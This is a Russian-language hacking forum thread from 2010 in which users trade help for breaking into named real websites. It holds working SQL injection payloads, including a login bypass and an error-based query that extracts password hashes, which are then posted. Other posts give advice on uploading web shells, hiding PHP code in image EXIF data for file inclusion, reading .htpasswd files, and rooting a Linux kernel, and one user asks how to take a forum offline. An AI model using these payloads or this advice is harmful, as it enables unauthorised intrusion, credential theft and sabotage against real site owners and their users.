речь шла о http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/ где используется уязвимость unserialize() а не где создается новый config/config.inc.php. если ты тут админ, то не значит что ты кого-то умнее, это значит что тебе непозволительно тупить, что ты как раз похоже и сделал. если я не прав, объясни на "пальцах" чего я не "сумел прочитать", только конкретно, понятно и с цитатами/ссылками, а не голословными заявлениями и объяснениями не понятно о каких дырах.

iSlava
19.06.2010, 16:38
а как можно заюзать open_basedir bypass удалённо?


Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(../../../../etc/init.d/apache2) is not within the allowed path(s): (/www/home/blabla/htdocs) in /www/home/blabla/htdocs/index.php on line 666


пробовал инклудить через Data протокол, не получалось (RFC 2397)

еще есть идея попробовать обойти ограничение на длину в addslashes, сработает? или для open_basedir пофиг будет?

FlaktW
19.06.2010, 16:51
Помогите вывести версию БД.

http://www.barenbrug.sk/index.php?siteid=66&page=item&nieuwsid=210')+and+substring(version(),1,1)=5+and+ ('1'='1

, или какие баги у этого движка:

RegioProviders CMS: 4.1.1, DB 4.1.1

DrakonHaSh
19.06.2010, 16:59
iSlava

попробуй Чтение php-кода из файла при наличии LFI (http://www.cr0w.ru/2009/08/lfi.html)

можешь, если прокатит, исходники сайта с данными для коннекта к mysql угнать

как же, там же, в Self-contained RFI in PHP посмотри исполнение через php://input, может он прокатит, раз через data не прокатило.

iSlava
19.06.2010, 18:33
DrakonHaSh не работат. там есть заглушка на случай если файла нет на hdd, вот она показывается на data и php filter. возможно там пхп

m0Hze
19.06.2010, 19:51
имеется иньекция при авторизации

http://cic.kz/admin/login

иньекция в поле поиска:

http://cic.kz/search/

пхпинфо:

http://cic.kz/phpinfo.php

практически все каталоги\папки доступны к индексированию:

http://cic.kz/classes/
http://cic.kz/wysiwyg/

раскрытие пути:

http://cic.kz/userfiles/LAW/kz/
http://cic.kz/wysiwyg/plugins/images/connector/yoursessioncheck.php

также имеется руки растущие оттуда, откуда сижу...
цель: получить доступ в админку либо залить шелл.


Проще некуда. В поле логин:


' or 1= 1 --

Без плюсов, только чистые пробелы.

Здравствуйте, Глеб. =)

[x60]unu
19.06.2010, 21:47
а поле серч хекается при запросе


xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

добавление :

Ну короче поахал себе мозг, вот что вышло

table : users (id,login.password)

gleb:609562b36985b13c69167ed9b3525c0a

VS:016d36db759cbd97f97b8f44d1586020

и т.д.

С хешами я хз, все вместились или нет

запрос


xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)e)b)a)/**/and/**/'1'='1

вообще вот )

CyberHunter
20.06.2010, 13:38
Скажите есть какой-то софт для поиска админки на сайте?

Скуль хелпер не работает.

Konqi
20.06.2010, 13:39
Скажите есть какой-то софт для поиска админки на сайте?
Скуль хелпер не работает.


ArxScanSite,AdminFinder,IntelliTamper,DirBuster

FlaktW
20.06.2010, 16:30
Помогите вывести версию БД.

http://www.syntex.sk/novinky.php?od=75+and+substring(version(),1,1)=5

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/html/syntex.sk/public_html/novinky.php on line 34

Seravin
20.06.2010, 16:41
По моему там чтото типа такого:

SELECT * FROM mytable where od='.mysql_real_escape_string($_GET['od']).';

Поэтому когда ты ставишь ковычку или чтото ещё то запрос возвращает просто пустой результат)

там нет проверки mysql_num_rows, поэтому это не скуля

EoGeneo
20.06.2010, 18:54
Помогите воспользоваться руткитом.

Собираюсь получить права рут на Linux Kernel 2.6.5

Вроде бы нашел сплойт http://milw0rm.com/exploits/8556

А как воспользоваться чётко незнаю.

iv.
20.06.2010, 19:47
Помогите воспользоваться руткитом.
Собираюсь получить права рут на Linux Kernel 2.6.5
Вроде бы нашел сплойт http://milw0rm.com/exploits/8556
А как воспользоваться чётко незнаю.


Ну, во-первых, это не руткит.

А как использовать можно найти в блоге автора - http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html В частности для компиляции нужны хедеры libsctp (пакет libsctp-dev для дебиана, например).

life_glider
20.06.2010, 23:58
$sql="INSERT INTO counter (ip,cookie,date) values('".$_SERVER['REMOTE_ADDR']."','".session_id()."',NOW())";

уязвим ли данный код?(mq-off)

Konqi
21.06.2010, 01:29
ребят у кого есть опыт заливки шелла в tigeradmin ?

Jokester
21.06.2010, 01:40
$sql="INSERT INTO counter (ip,cookie,date) values('".$_SERVER['REMOTE_ADDR']."','".session_id()."',NOW())";

уязвим ли данный код?(mq-off)


Нет, даже при mq-on, и вообще при любых настройках.

$_SERVER['REMOTE_ADDR'] не подменить

PS Ну разумеется если никакой чудокодер не глобализует там реквест, к примеру (это я для любителей "особых условий", что-бы не было соблазнов показать как всё может быть круто )

qq6ka
21.06.2010, 10:26
Помогите определить CMS.

Таблицы:

cms_websites

cms_users

cms_user_settings

cms_settings

cms_sequence

cms_sections

cms_news_cat

cms_document_stage

cms_document_rollback

cms_document

cms_comm

Или может кто знает путь в админпанель.

life_glider
21.06.2010, 13:23
Нет, даже при mq-on, и вообще при любых настройках.
$_SERVER['REMOTE_ADDR'] не подменить
PS Ну разумеется если никакой чудокодер не глобализует там реквест, к примеру (это я для любителей "особых условий", что-бы не было соблазнов показать как всё может быть круто
)


а session_id() ?

Seravin
21.06.2010, 13:41
по моему если бы всё это можно было менять то сайты сами бы ломались)

mailbrush
21.06.2010, 14:37
а session_id() ?


В айди сессии спецсимволы присутствовать не могут.

linuxkernal
21.06.2010, 14:57
Url is vulnerable

http://slingogaming.com/slingo_casino_news-story.php?id=-2+UNION+SELECT+1--+

problem is that i found admin panel http://slingogaming.com/admin/account/

and also admin username and email but password filed does not exit

so now i want to upload shell on it

and mysql.user: Host,User,Password also found

so please now how can i upload shell on it OR get .sql Database

DrakonHaSh
21.06.2010, 15:59
Нет, даже при mq-on, и вообще при любых настройках.
$_SERVER['REMOTE_ADDR'] не подменить
PS Ну разумеется если никакой чудокодер не глобализует там реквест, к примеру (это я для любителей "особых условий", что-бы не было соблазнов показать как всё может быть круто
)


я так понимаю ты про то, что если этот чудокодер использует import_request_variables или extract, то передав скрипту параметр

_SERVER[REMOTE_ADDR]=sql inj

можно поиметь уязвимость ?

кста, насчет "особых условий". разве весь процесс поиска уязвимостей это не есть поиск как раз именно этих особых условий ?

Jokester
21.06.2010, 16:22
я так понимаю ты про то, что если этот чудокодер использует import_request_variables или extract, то передав скрипту параметр
_SERVER[REMOTE_ADDR]=sql inj
можно поиметь уязвимость ?


да


кста, насчет "особых условий". разве весь процесс поиска уязвимостей это не есть поиск как раз именно этих особых условий ?


процесс поиска уязвимостей в коде - иногда да

процесс ответов на конкретные вопросы пользователей - нет

linuxkernal

Это русскоязычный форум, если тебе необходима помощь, будь добр переводить свои посты хотя-бы с помощью онлайн переводчиков, иначе я их буду тереть.

Seravin
21.06.2010, 16:48
Какие шеллы есть под ColdFusion?

m0Hze
21.06.2010, 17:32
Какие шеллы есть под ColdFusion?


Втф? Может быть ты хотел сказать сплойты? Поиск на милворме никто не отменял.

mailbrush
21.06.2010, 18:36
Url is vulnerable
http://slingogaming.com/slingo_casino_news-story.php?id=-2+UNION+SELECT+1--+
problem is that i found admin panel http://slingogaming.com/admin/account/
and also admin username and email but password filed does not exit
so now i want to upload shell on it
and mysql.user: Host,User,Password also found
so please now how can i upload shell on it OR get .sql Database


this is .htaccess protection. you must load .htpasswd file, where passwords are stored

linuxkernal
21.06.2010, 18:39
Url уязвим

http://slingogaming.com/slingo_casino_news-story.php?id=-2+UNION+SELECT+1--+

Проблема в том, что я нашел админ-панели http://slingogaming.com/admin/account/

, а также имя пользователя администратора и пароль электронной почте, но не подал выхода

Так что теперь я хочу, чтобы загрузить на него снаряд

и mysql.user: Host, пользователь, пароль и нашли

поэтому, пожалуйста, теперь, как я могу загрузить оболочки на нем, либо получить. База данных SQL

linuxkernal
21.06.2010, 18:43
this is .htaccess protection. you must load .htpasswd file, where passwords are stored



Вы можете сказать мне, как к нагрузке. htpasswd файл

mailbrush
21.06.2010, 19:03
Вы можете сказать мне, как к нагрузке. htpasswd файл


try load_file function and don't use translator

попугай
21.06.2010, 19:05
Какие шеллы есть под ColdFusion?
















Command:

value="#form.cmd#">





Options:

value="#form.opts#" >





Timeout:

value="#form.timeout#"value="5" >



















#myVar#









/thread71680.html

Seravin
21.06.2010, 19:20
я это заливал, но учитывая что я с cfm ниразу, то хз почему н работает(всмысле то что я не могу найти ответ почему выдаёт ошибку)


The error occurred in E:\Inetpub\**\123.cfm: line 24

22 :
23 :
24 :
25 :
26 :

попугай
21.06.2010, 19:22
я это заливал, но учитывая что я с cfm ниразу, то хз почему н работает(всмысле то что я не могу найти ответ почему выдаёт ошибку)

The error occurred in E:\Inetpub\**\123.cfm: line 24

22 :
23 :
24 :
25 :
26 :




Во-первых, теги правильно пиши - убери пробелы до и после знаков ">" и "[/COLOR][/COLOR]
[/PHP]
название файла на своё.

Konqi
21.06.2010, 19:25
ребят не могу залить шелл, в админке есть место для загрузки картинок,но стоит хороший фильтр и на стороне сервера и на JS..

при загрузке php файла вылетает aкошка JS и говорит что нельзя этот формат и тп, но файл все же загружается, но когда иду по линку файла то виден только один символ и пустая страница

то есть если контент файла




то на странице видна только символ '

Pashkela
21.06.2010, 19:42
на сайте еще есть LFI, впихнул пхп код в конце гиф файлa чтоб инклудить, нo фильтр обрезал пхп и оставил только сорцы gif..
вот такая печальная история,нужен профи)
поделитесь советами plz


А ты запиши в EXIF, а не в конец файла, и, если картинка меняет размер после заливки (скриптом), то попробуй залить картинку такого же размера, как и тестируемая - может и прокатит

PS: Ну и потом, если есть LFI - есть и куча других способов - логи, сессия и etc.

Seravin
21.06.2010, 19:44
Во-первых, теги правильно пиши - убери пробелы до и после знаков ">" и "[/COLOR][/COLOR]
[/PHP]
название файла на своё.


так ошибка на 24ой строке же

Konqi
21.06.2010, 19:52
А ты запиши в EXIF, а не в конец файла, и, если картинка меняет размер после заливки (скриптом), то попробуй залить картинку такого же размера, как и тестируемая - может и прокатит
PS: Ну и потом, если есть LFI - есть и куча других способов - логи, сессия и etc.


СПАСИБО Pashkela, попробую

Seravin
21.06.2010, 20:33
догнал уже, спс всем кто помог) тяжело было как для тупого объяснить?)

IMMORTAL_S
21.06.2010, 23:03
sql inj - восстановление пароля

всем привет. буду краток...с мобильного.

выяснил, что данные из поля для восстановления пароля участвуют в запросе:

select * from utbl where user=`o@lo.lo' or email='o@lo.lo'

при ошибке выводится тело запроса...как выше

' - проходит в запрос

; - в исходниках страницы показан как &#(цифры) или как-то так, не помню.

" - в каком виде, не проверил.

вопрос: можно ли провести inj или что выжить из этого по максимуму?

wildshaman
21.06.2010, 23:32
Если кавычка проходит нормально в запрос и выдается ошибка - то да, скуля, крутить юнионом.

IMMORTAL_S
22.06.2010, 00:24
куда же результат будет выводиться¿

...лан, завтра буду пробовать

wildshaman
22.06.2010, 00:31
Если не будут - крутить как слепую

/threadnav119047-2-10.html

mailbrush
22.06.2010, 01:21
Через эту инъекцию ты можешь сменить пароль админа.

Если, конечно, поля угадаешь.

IMMORTAL_S
22.06.2010, 12:44
' - проходит в запрос
; - в исходниках страницы показан как &#(цифры) или как-то так, не помню.
" - в каком виде, не проверил.
вопрос: можно ли провести inj или что выжить из этого по максимуму
?


Пля.. проверил, ' и " не проходят... попадают в запрос как &# 039; и &quot;

Что в данном случае можно сделать?

Konqi
22.06.2010, 20:57
ребят помогите со скулом

http://www.editrans.de/?view=article&id=6+order+by+1

mailbrush
22.06.2010, 21:11
Двойной запрос.

Крути как слепую.

Konqi
22.06.2010, 21:14
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5

а вот так не прокатило

http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+

mailbrush
22.06.2010, 22:03
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5

Вот так и крути.

Оффтоп: цитировать предыдущее сообщение не нужно

InfectedM
23.06.2010, 04:22
Где IPB 3+ хранит соль?

И какой алгаритм шифровки искользуется?

Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?

Columns: Table ibf_members

name

mgroup

email

joined

ip_address

posts

title

allow_admin_mails

time_offset

hide_email

email_pm

email_full

skin

warn_level

warn_lastwarn

language

last_post

restrict_post

view_sigs

view_img

view_avs

view_pop

bday_day

bday_month

bday_year

new_msg

msg_total

show_popup

misc

last_visit

last_activity

dst_in_use

view_prefs

coppa_user

mod_posts

auto_track

orig_name

lastnamechange

namehistory

org_perm_id

temp_ban

sub_end

login_anonymous

ignored_users

mgroup_others

member_login_key

member_login_key_expire

subs_pkg_chosen

has_blog

members_auto_dst

members_cache

members_disable_pm

members_display_name

members_created_remote

members_editor_choice

members_markers

members_profile_views

members_l_display_name

members_l_username

failed_logins

failed_login_count

has_gallery

gallery_perms

t23_pcr_time

ip_geo

Bramin
23.06.2010, 09:33
http://www.elixirherbals.com

Konqi
23.06.2010, 11:35
Где IPB 3+ хранит соль?
И какой алгаритм шифровки искользуется?
Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?


md5(md5($salt).md5($pass))

Dare
23.06.2010, 12:38
http://www.lstc.edu

Буду безумно благодарен, если кто поможет найти админку

BlackFan
23.06.2010, 14:10
Вот это нашел только, хз то или нет)

2 Dare

http://www.lstc.edu/intranet/

2 Bramin

http://www.elixirherbals.com:2082/

Train
23.06.2010, 14:11
http://lstcnet.lstc.edu/ics

Вот это не подойдет?

А вообще ты глянь из какой ты базы данных хочешь пароли-явки взять.

se55555
23.06.2010, 15:11
Парни, всем привет. В общем не мое это дело, ломать форумы, я обычный программист, но стала такая ситуация очень нужной, а разобраться до самого последнего конца не могу.

Есть форум: _forum.help-animal. org.ua

Настоящая организация уже давно уехала с форума, делает себе новый сайт, а владелец этого форума еще пишет от ихнего имени.

Цель: Сделать сайт недоступным для общества.

Я так понял, форум вообще не защищен, так как устанавливали люди, которые в этом деле не совсем разбираются.

Я понимаю, что никто на блюдечке мне не принесет пароль администратора, по этому прошу хотя-бы подсказать путь, в каком направлении мне двигаться.

Буду раз за помощь.

В данной ситуации я смог только увидеть chenlog.html, установить Perl и начать запускать готовые pl скрипты, но дальше тупик. Понять суть заливания шелов тоже не могу, подмена печенек в этой версии форума, как я понял невозможна, за sql "прививки" вообще молчу . Так-что я продвинулся не так далеко, как бы хотел.